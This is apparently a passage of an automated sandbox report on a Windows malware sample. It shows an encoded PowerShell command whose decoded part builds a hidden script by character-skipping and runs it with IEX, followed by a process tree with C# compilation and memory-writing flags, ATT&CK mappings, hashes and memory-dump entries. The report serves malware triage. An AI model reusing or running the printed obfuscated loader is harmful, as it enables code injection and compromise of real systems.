BhAHMAdQBuAHQAUwBwAGUAYwBpACAAQgBsAG8AZAB0AHYAUABoAGEAbABhADEAVABlAHIAcgBhACwARwByAHUAbgBkAGkASwB1AG4AZABlAG4AQwBoAHIAbwBuAHQAUgBlAHQAcgB0ACAAcwB1AGwAcABoAHYAdgBlAGwAbABlADIAdQB0AG4AawBlACkAUgBlAHYAYQBuADsACgBiAGUAYQB1AHAAfQAKAFMAdABpAGwAZQAiAE0AYQBuAHQAaQBAAAoAVQBjAGgAZQBlACQARgByAGEAbQBtAE8ARgByAGUAZABuAHYAUABvAHIAdABvAGUATABpAHIAawBhAHIARwBsAGEAbgBkADMAdgBlAG4AZQByAD0AVABhAHAAaQBzAFsARgByAGUAbQBzAE8AUgB5AHQAdABlAHYAUgBpAHYAbgBpAGUAUABzAHkAYwBoAHIATABhAHUAcgBpADEARABpAHMAYwBlAF0AbQBhAGQAbwBsADoAUgBpAGcAcwBiADoAUwBwAHIAbwBnAFYAYgBpAGEAdABvAGkAQQBkAG8AcAB0AHIAUAByAGUAYwBvAHQAUgBlAG4AbwB2AHUAVABuAGQAYgBhAGEAVgBhAG4AZABiAGwARwBlAG4AcwBrAEEAVQBnAHUAbgBzAGwAUgByAGcAcwBtAGwAQgBlAHMAdAB5AG8AUwBpAG4AdQBhAGMAQgBlAGMAbwBtACgARABvAGcAbQBlADAAUwBrAHUAbQBtACwAUgBlAGcAaQBzADEATgBvAG4AYwBoADAAVwBhAHUAYwBoADQATQBhAGcAaQBjADgAUABlAHQAcgBvADUAVABpAGwAbABpADcAUgBpAG4AZwByADYARQBuAHMAaQBkACwAQQBkAG8AcgBhADEAQgBhAHMAcgBlADIAUgBzAG8AbgBuADIAQgB1AG4AZABmADgASgBlAHIAZQBtADgAUwB0AHkAbABvACwATABuAGkAbgBkADYAdQB0AGkAcwBtADQAVgBhAGwAdQB0ACkACgBQAGUAbgB0AGEAJABCAGUAawBsAGEAVABPAG4AZQBzAHQAZQBFAHgAcABsAG8AcwBPAGIAagBlAGsAdABFAHMAYwBvAGMAYQBGAG8AcgBkAGUAYwBGAG8AcgBzAGEAeQBCAGkAdAB0AGUAcABEAGUAcwB0AGkAbwBJAG0AcABsAGUAZABCAHIAZQBkAGIAPQBXAGkAbgBkAGkAKABQAHIAbwB2AG8ARwBBAHMAdAByAG8AZQBOAG8AbgBpAHIAdABEAHUAYgBsAGUALQBCAGUAcwBsAGEASQBCAGUAcAByAGEAdABIAGUAbQBtAGUAZQBaAGEAbgB6AGkAbQBFAG4AZwBhAG4AUABIAGEAbQBhAHQAcgBMAHkAbQBwAGgAbwBSAGgAZQBpAG4AcABmAG8AcgBnAHIAZQBIAHkAcABlAHIAcgBUAHIAYQB2AGUAdABTAHQAYQBrAGwAeQBPAHAAdABhAGcAIABSAGEAYQBzAHkALQBTAGoAbABzAHMAUABXAGgAaQB0AGUAYQBPAHAAZwBhAHYAdABPAHQAbwBsAG8AaABTAGEAawBrAGEAIABFAHgAcABpAGEAIgBBAHAAcgBpAG8ASABBAGsAawB2AGkASwBFAGwAbABlAHIAQwBTAGsAcgBpAHYAVQBGAG8AcgBlAG0AOgBWAG8AbQBtAGUAXABVAG4AYwBlAGEAUwBQAGwAdQByAGEAbwBBAGQAZQBuAG8AZgBMAG8AdwBlAHIAdABSAGUAagBuAGUAdwBDAGUAbgB0AHIAYQBGAGUAcgBsAHkAcgBTAHQAYQBkAHMAZQBGAHIAdQBnAHQAXABGAHIAcwB0AGUARABUAGUAbgBkAHIAZABTAHkAcwB0AGUAcwBLAGwAYQBwAGgAbwBUAGEAawBuAGkAZgBVAGQAZABhAG4AZgBQAGUAbgBkAGEAZQBNAGUAcwBvAGcAcgBTAHAAeQB0AGsAIgBzAHQAbwByAHQAKQBVAG4AZQBuAGcALgBNAGEAbABhAGMAVABFAGMAdQB2AGUAaAB2AGkAegBhAHIAaQBEAHkAcgBlAGgAcgBLAGEAYgB5AHMAZABPAHYAZQByAHMAbABNAGEAdABlAG0AaQBMAGkAcwB0AGUAbgAKAE4AcgBlAG4AZAAkAFIAaQBnAHMAZABVAE0AaQBuAHUAdABuAGMAcgBhAHcAZABhAEEAZgBzAGwAYQBiAEoAYQBlAHYAbgBqAFAAcgBqAHMAZQB1AEEAawB0AGkAZQByAEoAbwByAGQAZgAgAEMAbwBuAHQAZQA9AEEAZgBnAGEAbgAgAFMAYwBpAHMAcwBbAEEAbAB2AG8AcgBTAFIAZQBuAGUAdwB5AFkAbgBnAHMAdABzAEUAdAB0AGUAcgB0AEsAbABpAHAAcABlAEwAZwBlAGEAdABtAFQAYQBhAHIAZQAuAEYAbwByAGsAbwBDAEYAbwByAGgAYQBvAEIAYQBsAHQAegBuAEQAZQBoAHkAZAB2AFIAbwBkAGwAcwBlAEMAcgBvAHQAYQByAFMAdQByAG0AdQB0AEYAZQBqAGwAawBdAFUAbgBkAGUAcgA6AGYAbwByAG0AYQA6AGYAcgBpAG0AaQBGAFAAcwB5AGMAaAByAEwAYQByAHkAbgBvAFMAbwBmAGYAaQBtAEEAbgB0AGkAcQBCAFMAbABhAGcAdABhAFIAZQBrAG8AcgBzAFYAYQBjAGEAbgBlAFMAbwBmAGEAZwA2AFAAdQBuAGcAZQA0AEIAZQByAGUAZABTAEcAdQBsAHIAYQB0AHMAdABvAHIAawByAFMAawBpAHAAawBpAFMAdAB1AHQAdABuAEQAZQBjAGUAbgBnAGEAdQB0AG8AcAAoAFMAcABpAHIAYQAkAE8AbwBsAG8AZwBUAEIAeQBnAGIAYQBlAFMAdAB5AHIAdABzAHAAaABvAHQAbwB0AE8AcABrAGwAYgBhAFYAcwBrAGUAZABjAE4AeQBtAGEAYQB5AFYAYQBhAGQAcwBwAFQAcgBpAG4AZABvAFMAaQBtAHAAbABkAEQAZQBwAGwAbwApAAoAVQBwAHcAYQByAFsAUgBpAGQAZABlAFMAQgBsAGEAYwBrAHkATgBhAHQAdQByAHMAQgB1AHMAdABoAHQARABpAHAAcwBvAGUATgBlAHQAdABlAG0AVgB1AHIAZABlAC4AQgBvAG4AZABlAFIAZwBsAGkAcwBzAHUAVAByAG8AYwBoAG4ASwBhAGEAbAByAHQAQgBhAG4AagBvAGkAUgBlAGYAbwByAG0ASQBuAGQAdQBjAGUAVABvAHUAcgBpAC4ARgBvAHIAZwBlAEkAVQBuAGQAZQByAG4AUwB0AHIAYQBuAHQAawBsAGkAbgBnAGUAagB1AHYAZQBsAHIAQgBlAGcAdQBuAG8AUgBlAHYAYQBsAHAATABlAHQAaABlAFMASQBuAGQAawBhAGUAVAByAGEAdgBlAHIAVABvAGwAZABrAHYAcgBlAHAAZQByAGkAbwByAGQAawBuAGMAUwBhAHQAYwBoAGUAUwBwAGkAbAB2AHMASwBsAGkAbQBhAC4ATgBvAHAAcgBlAE0ASwByAHkAZABzAGEATABpAGcAZQBmAHIATQBhAHMAcwBlAHMASABhAGEAbgBkAGgAQQByAG0AYQBnAGEAYQBuAG8AZABpAGwAYwBvAHAAeQByAF0AUAByAGUAcgBlADoASABvAHYAbQBvADoATABzAGUAaABhAEMAQgBlAHMAdwBhAG8AVQBuAGgAZQBsAHAASQBsAHMAZQBiAHkAZgBsAG8AcwBzACgARgBqAGUAbgBkACQAQQBpAHoAbwBhAFUAUgB2AHIAZABpAG4ASABhAG4AZABnAGEAYQBkAHYAbwBrAGIAVQBsAHQAcgBhAGoASwByAGEAcABzAHUAVgBlAHIAdABlAHIAbABvAHkAYQBsACwAVgBlAGoAZgBhACAAUABsAHMAZQBkADAAYwBvAG0AbQB1ACwAUwB0AGEAbABkACAAQQBsAGwAbwB0ACAAUABpAG4AZABlACQASQBuAG8AcgBkAE8ASQBtAGEAbQBhAHYASQBuAGYAbwByAGUAUwBtAGEAYQBkAHIAVQBkAHMAawBpADMAUgB1AHMAcwBpACwASQBuAGYAZQByACAATQBhAGwAdgBpACQAcABsAGkAZwB0AFUAUgBlAGEAawB0AG4AUwB0AHkAcgBlAGEAVABhAHAAZQB0AGIASABhAHUAcwBmAGoARgBvAHIAbABkAHUAVQBuAGkAbgBmAHIARgBvAHIAdABqAC4AUwBrAGkAbQBtAGMARABlAHQAYQBpAG8AVwBlAGIAbABzAHUASwBvAG0AcABsAG4ARgB1AG0AZQB3AHQATgB2AG4AZQBuACkAQwBvAHQAcwBlADsACgBTAG0AYQBhAGIAWwBJAG4AdQByAG4ATwBWAGEAZwB0AHAAdgBDAGgAYQBpAG4AZQBVAHIAYQBuAGIAcgBGAG8AcgBlAG4AMQBQAGEAYwBlAGQAXQBBAHIAaQBuAGUAOgBTAGsAdgBhAHQAOgBiAGkAcwBtAGEARQBJAGQAZQBvAGcAbgBzAGUAcgBhAGkAdQBwAGwAYQBuAG8AbQBGAG8AcgBtAGkAUwBSAGUAYQBzAHMAeQBVAG4AZAB1AGIAcwBHAHIAZABhAGcAdABVAG4AdABhAHIAZQBCAHIAaQBrAHYAbQBDAHkAcwB0AG8ATABQAHUAbgBrAGUAbwBjAGkAYwBhAHQAYwBDAGgAbwByAGkAYQBPAGIAbABpAHEAbABTAGMAaABhAHQAZQBBAHAAcABlAGEAcwBDAG8AbgBjAGkAQQBQAGgAbwByAHIAKABQAG8AaQBuAHQAJABHAGUAbQBtAG8ATwBUAGUAdgBhAG4AdgBKAG8AcgBkAGIAZQBBAGkAcgB0AGkAcgB0AGUAcgBuAGEAMwBMAGUAZABzAGEALABpAG4AZQBsAGEAIABTAHQAZQBkAG0AMABGAHUAZwB0AGQAKQBQAHIAaQBtAHQAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABHAGEAcwBsAGkAZwBoAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQgBlAG0AdQBzAGsAIAA9ACAAJABCAGUAbQB1AHMAawAgACsAIAAkAEcAYQBzAGwAaQBnAGgALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABHAGEAcwBsAGkAZwBoAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEIAZQBtAHUAcwBrACAAPQAgACQAQgBlAG0AdQBzAGsAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABCAGUAbQB1AHMAawANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymg5hpvp\ymg5hpvp.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA856.tmp" "c:\Users\Admin\AppData\Local\Temp\ymg5hpvp\CSC66CA13789281474A9F406BB65E55D5.TMP"
      4⤵
      PID:4252

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA856.tmp

Filesize
1KB

MD5
63602ff8d6207c3ed4714a4a2fe9d955

SHA1
e48bd162437592c09eb7f09ad82aa0b598da71a5

SHA256
5da3dbeaf80d5b7e9a6764bc74a73774740ec1aca1620e0bfdff85289d720ffa

SHA512
6ecdbf74c4f279ec4eccd89864d903f24111faa479ba3e77f0ee8ee74a7ba4f404e82201e9e91773a9e1753cc8119de039edf66e65d2b665600fc034021da4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ymg5hpvp\ymg5hpvp.dll

Filesize
3KB

MD5
3027ef96b5b7fbb4e8a6a4848cfc1b87

SHA1
de062e6af307cb7b961b45a59b221c949117dd84

SHA256
a673d2d05b410dad2fd2feb73ac9e9bebcb2b0d98b30cfbb7d571d9732c4147b

SHA512
86c4b864094197c0bec2ff6a3ecd4e4d5de9c2b754635c5d293cfc03cf57af05e3d0fdfdcda18cb2bf9060fdcfe236c4189a1680f7bf89962c349aa647c46c58

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ymg5hpvp\CSC66CA13789281474A9F406BB65E55D5.TMP

Filesize
652B

MD5
07eeac234385fa1de7f9836a367f8311

SHA1
c4a16367704f818425c1bcf6c0a9dd90c41f5df2

SHA256
269bee020b9e5c3be1a5adde4c8e691f209894e880aad7e23233aea13eaf38b9

SHA512
99d1943b7d4ee19207b7d413b5cb27ea5ffe56927e8282ecbd96905699025c171d053424acb8c58b4a4793f15a18e305c5ed6ca2930a35053b3fd2730415daf8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ymg5hpvp\ymg5hpvp.0.cs

Filesize
910B

MD5
8bc6902c9554f8e17fdb227670053f69

SHA1
36bf150cb69b52688beec1483a5b0f32f7709c46

SHA256
73d4b18caad7ad9e4bd8957be138ee440008c3a27859a025136525102e9f8114

SHA512
9f8da240977b055655e7f7ed2dbd11a28bffde0799761c2e51d3473f0ee0c93510ee11e68d130b0b5b9341ec7ef0a3f62b75eeb76891491c7fb56d0b6ba37027

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ymg5hpvp\ymg5hpvp.cmdline

Filesize
369B

MD5
b0ffdb00f7f1be9c6e40d412eec5b3ea

SHA1
9b4def45fe494a4213bd492e1148fa6ccbdf4203

SHA256
ae5a3dcf5bbdbd579a938acd2bd741824c994de2a421629bf696c948c5eb4005

SHA512
e7ed6a605177562985edcbf9499767700953fffa6848a75dc288252430f9179e20628d2c2decf00330534a239ab472e36c74aae2914e49b8ea0f06d0c0f21038

Download Submit
memory/2040-149-0x0000000007230000-0x0000000007252000-memory.dmp

Filesize
136KB

Download
memory/2040-133-0x0000000002A20000-0x0000000002A56000-memory.dmp

Filesize
216KB

Download
memory/2040-139-0x00000000078F0000-0x0000000007F6A000-memory.dmp

Filesize
6.5MB

Download
memory/2040-140-0x00000000070A0000-0x00000000070BA000-memory.dmp

Filesize
104KB

Download
memory/2040-152-0x0000000007130000-0x0000000007230000-memory.dmp

Filesize
1024KB

Download
memory/2040-138-0x0000000005F90000-0x0000000005FAE000-memory.dmp

Filesize
120KB

Download
memory/2040-134-0x0000000005180000-0x00000000057A8000-memory.dmp

Filesize
6.2MB

Download
memory/2040-135-0x00000000050E0000-0x0000000005102000-memory.dmp

Filesize
136KB

Download
memory/2040-151-0x0000000007130000-0x0000000007230000-memory.dmp

Filesize
1024KB

Download
memory/2040-136-0x00000000058E0000-0x0000000005946000-memory.dmp

Filesize
408KB

Download
memory/2040-148-0x0000000007350000-0x00000000073E6000-memory.dmp

Filesize
600KB

Download
memory/2040-137-0x0000000005950000-0x00000000059B6000-memory.dmp

Filesize
408KB

Download
memory/2040-150-0x0000000008520000-0x0000000008AC4000-memory.dmp

Filesize
5.6MB

Download

Analysis

Sharing